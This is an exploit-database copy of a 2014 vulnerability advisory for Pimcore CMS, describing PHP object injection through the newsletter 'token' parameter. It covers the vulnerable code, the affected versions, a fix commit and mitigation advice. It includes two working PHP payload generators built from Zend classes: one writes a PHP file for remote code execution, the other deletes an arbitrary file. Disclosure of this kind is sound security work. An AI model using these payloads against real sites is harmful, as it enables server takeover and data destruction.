"Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities"

Author

Exploit author

"Pedro Ribeiro"

Platform

Exploit platform

hardware

Release date

Exploit published date

2014-10-12

                
                    
                         Download file
                    
                
            
> Vulnerabilities in Pimcore 1.4.9 to 2.1.0 (inclusive)
> Discovered by Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security
====================================================================
Disclosure: 14/04/2014 / Last updated: 12/10/2014

Vulnerability: Remote code execution in Pimcore CMS via unserialize() PHP object injection (CVE-2014-2921)
Vulnerability: Arbitrary file deletion in Pimcore CMS via unserialize() PHP object injection (CVE-2014-2922)
File(line): pimcore/lib/Pimcore/Tool/Newsletter.php(221)

Summary:
This vulnerability can be exploited by sending a base64 encoded payload as the "token" parameter to the newsletter unsubscribe page of the target site. Payload [1] abuses several Zend classes to achieve remote code execution (based on Stefan Esser's technique in [2] and Egidio Romano's exploit code from [3]). Payload [4] abuses Zend_Http_Response_Stream to delete a file in /tmp/deleteme and works in all PHP versions.

Versions affected:
1.4.9 to 1.4.10 (inclusive) / 2.0.0 (possibly): Remote code execution (when server is running PHP <= 5.3.3). 
1.4.9 to 2.1.0 (inclusive): Arbitrary file deletion (any PHP version), POSSIBLY remote code execution.
Version 2.2.0 or higher resolves this vulnerability.

Due to changes introduced in PHP 5.3.4 to reject file names with null bytes, payload [3] does not work on Pimcore versions between 2.0.1 and 2.1.0 as Pimcore enforces a PHP 5.4 requirement. Version 2.0.0 might be vulnerable if anyone is running it on PHP versions <= 5.3.3... which according to the developers is not possible, but the requirement was only enforced in 2.0.1.
Note that however the underlying vulnerability for both the remote code execution and the arbitrary file deletion is the same (unserialize() object injection), so it might be possible to execute code if any other Zend PHP POP chains are found in the future.


Fix for vulnerability:
https://github.com/pimcore/pimcore/commit/3cb2683e669b5644f180d362cfa9614c09bef280


Newsletter.php added to repository on February 25th 2013 (was released in 1.4.9 on 02/Mar/13):
https://github.com/pimcore/pimcore/commit/db18317af47de1de9f9ec6d83db1c2d353d06db7


PHP 5.4 requirement introduced on October 31st 2013 (was released in 2.0.1 on 20/Dec/13):
https://github.com/pimcore/pimcore/commit/ee56ac2c1f7c9dc6e1617023fc766ea9c67e601b


Code snippets:

pimcore/lib/Pimcore/Tool/Newsletter.php(221):

    public function getObjectByToken($token) {
        $data = unserialize(base64_decode($token));
        if($data) {
            if($object = Object_Abstract::getById($data["id"])) {

                if($version = $object->getLatestVersion()) {
                    $object = $version->getData();
                }


This function is called in the same file in confirm() and unsubscribeByToken():
    public function confirm($token) {

        $object = $this->getObjectByToken($token);
        if($object) {


    public function unsubscribeByToken ($token) {

        $object = $this->getObjectByToken($token);
        if($object) {


In the Pimcore Wiki[5] and sample site[6], users are shown how to use the token parameter and encourage you to take the sample code and modify it.
The sample code passes the token directly without any validation in confirmAction():
    public function confirmAction() {

        $this->enableLayout();

        $this->view->success = false;

        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)

        if($newsletter->confirm($this->getParam("token"))) {
            $this->view->success = true;
        }


And also in unsubscribeAction():
    public function unsubscribeAction() {

        $this->enableLayout();

        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)

        $unsubscribeMethod = null;
        $success = false;

        if($this->getParam("email")) {
            $unsubscribeMethod = "email";
            $success = $newsletter->unsubscribeByEmail($this->getParam("email"));
        }

        if($this->getParam("token")) {
            $unsubscribeMethod = "token";
            $success = $newsletter->unsubscribeByToken($this->getParam("token"));
        }


Mitigation:
Do not pass untrusted input into the unserialize function. Use JSON encoding / decoding instead of unserialize. This was introduced in commit 3cb2683e669 and released in version 2.2.0.

References:
========================================================
[1] Remote code execution, PHP <= 5.3.3, original code from [3] (Egidio Romano)
<?php

class Zend_Search_Lucene_Index_FieldInfo
{
    public $name = '<?php phpinfo(); die;?>';
}
 
class Zend_Search_Lucene_Storage_Directory_Filesystem
{
    protected $_dirPath = null;
     
    public function __construct($path)
    {
        $this->_dirPath = $path;
    }
}
 
interface Zend_Pdf_ElementFactory_Interface {}
 
class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface
{
    protected $_docCount = 1;
    protected $_name = 'foo';
    protected $_directory;
    protected $_fields;
    protected $_files;
     
    public function __construct($directory, $fields)
    {
        $this->_directory = $directory;
        $this->_fields    = array($fields);
        $this->_files     = new stdClass;
    }
}    
 
class Zend_Pdf_ElementFactory_Proxy
{
    private $_factory;
     
    public function __construct(Zend_Pdf_ElementFactory_Interface $factory)
    {
        $this->_factory = $factory;
    }
}
 
// This null byte technique only works in PHP <= 5.3.3
$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/malicious.php\0");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);
 
echo base64_encode(serialize($____proxy));

?>

========================================================
[2] http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
[3] http://www.exploit-db.com/exploits/19573
========================================================
[4] Arbitrary file deletion, all PHP versions
<?php
class Zend_Http_Response_Stream 
{
    protected $stream;
    protected $stream_name;
    protected $_cleanup;
    public function setStream($stream)
    {
        $this->stream = $stream;
        return $this;
    }
    public function setCleanup($cleanup = true) {
        $this->_cleanup = $cleanup;
    }
    public function setStreamName($stream_name) {
        $this->stream_name = $stream_name;
        return $this;
    }
}
$resp = new Zend_Http_Response_Stream();
$resp->setStream(null);
$resp->setCleanup();
$resp->setStreamName("/tmp/deleteme");

echo base64_encode(serialize($resp));
?>

========================================================
[5] http://www.pimcore.org/wiki/display/PIMCORE/Newsletter
[6] Downloadable from the Pimcore website (https://www.pimcore.org/download/pimcore-data.zip). The file mentioned is website/controllers/NewsletterController.php.

Other references:
https://www.owasp.org/index.php/PHP_Object_Injection
http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/
http://vagosec.org/2013/12/wordpress-rce-exploit/


================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-11-30	"Intelbras Router RF 301K 1.1.2 - Authentication Bypass"	webapps	hardware	"Kaio Amaral"
2020-11-30	"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure"	webapps	hardware	"Zagros Bingol"
2020-11-27	"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution"	webapps	hardware	"Emre SUREN"
2020-11-24	"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)"	webapps	hardware	maj0rmil4d
2020-11-23	"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass"	webapps	hardware	malwrforensics
2020-11-19	"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure"	remote	hardware	"Nitesh Surana"
2020-11-19	"Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification"	webapps	hardware	"Ricardo Longatto"
2020-11-16	"Cisco 7937G - DoS/Privilege Escalation"	remote	hardware	"Cody Martin"
2020-11-13	"Citrix ADC NetScaler - Local File Inclusion (Metasploit)"	webapps	hardware	"RAMELLA Sebastien"
2020-11-13	"ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)"	webapps	hardware	b1ack0wl

Release Date	Title	Type	Platform	Author
2019-08-21	"Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities"	remote	multiple	"Pedro Ribeiro"
2018-01-22	"AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution"	remote	hardware	"Pedro Ribeiro"
2017-03-24	"NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)"	remote	hardware	"Pedro Ribeiro"
2017-01-31	"Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities"	webapps	hardware	"Pedro Ribeiro"
2016-12-21	"NETGEAR WNR2000v5 - Remote Code Execution"	remote	cgi	"Pedro Ribeiro"
2016-08-10	"WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities"	webapps	jsp	"Pedro Ribeiro"
2016-08-05	"NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities"	remote	hardware	"Pedro Ribeiro"
2016-04-11	"Novell ServiceDesk 6.5/7.0.3/7.1.0 - Multiple Vulnerabilities"	webapps	jsp	"Pedro Ribeiro"
2016-02-04	"NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities"	webapps	hardware	"Pedro Ribeiro"
2015-09-29	"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)"	webapps	asp	"Pedro Ribeiro"
2015-09-28	"BMC Track-It! 11.4 - Multiple Vulnerabilities"	webapps	windows	"Pedro Ribeiro"
2015-09-28	"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload"	webapps	asp	"Pedro Ribeiro"
2015-07-15	"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)"	webapps	windows	"Pedro Ribeiro"
2015-06-10	"SysAid Help Desk 14.4 - Multiple Vulnerabilities"	webapps	hardware	"Pedro Ribeiro"
2015-06-10	"ICU library 52 < 54 - Multiple Vulnerabilities"	local	multiple	"Pedro Ribeiro"
2015-04-08	"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution"	webapps	jsp	"Pedro Ribeiro"
2015-02-09	"ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities"	webapps	multiple	"Pedro Ribeiro"
2015-01-18	"Lorex LH300 Series - ActiveX Buffer Overflow (PoC)"	dos	hardware	"Pedro Ribeiro"
2015-01-15	"ManageEngine Desktop Central - Create Administrator"	webapps	multiple	"Pedro Ribeiro"
2014-12-03	"ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download"	webapps	multiple	"Pedro Ribeiro"
2014-11-10	"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities"	webapps	jsp	"Pedro Ribeiro"
2014-11-10	"Password Manager Pro / Pro MSP - Blind SQL Injection"	webapps	multiple	"Pedro Ribeiro"
2014-11-09	"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities"	webapps	multiple	"Pedro Ribeiro"
2014-11-05	"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)"	webapps	multiple	"Pedro Ribeiro"
2014-10-12	"CMS Made Simple 1.11.9 - Multiple Vulnerabilities"	webapps	php	"Pedro Ribeiro"
2014-10-12	"GetSimple CMS 3.3.1 - Cross-Site Scripting"	webapps	php	"Pedro Ribeiro"
2014-10-12	"Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities"	webapps	hardware	"Pedro Ribeiro"
2014-10-09	"BMC Track-It! - Multiple Vulnerabilities"	webapps	windows	"Pedro Ribeiro"
2014-10-02	"ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)"	remote	java	"Pedro Ribeiro"
2014-09-01	"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution"	webapps	jsp	"Pedro Ribeiro"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.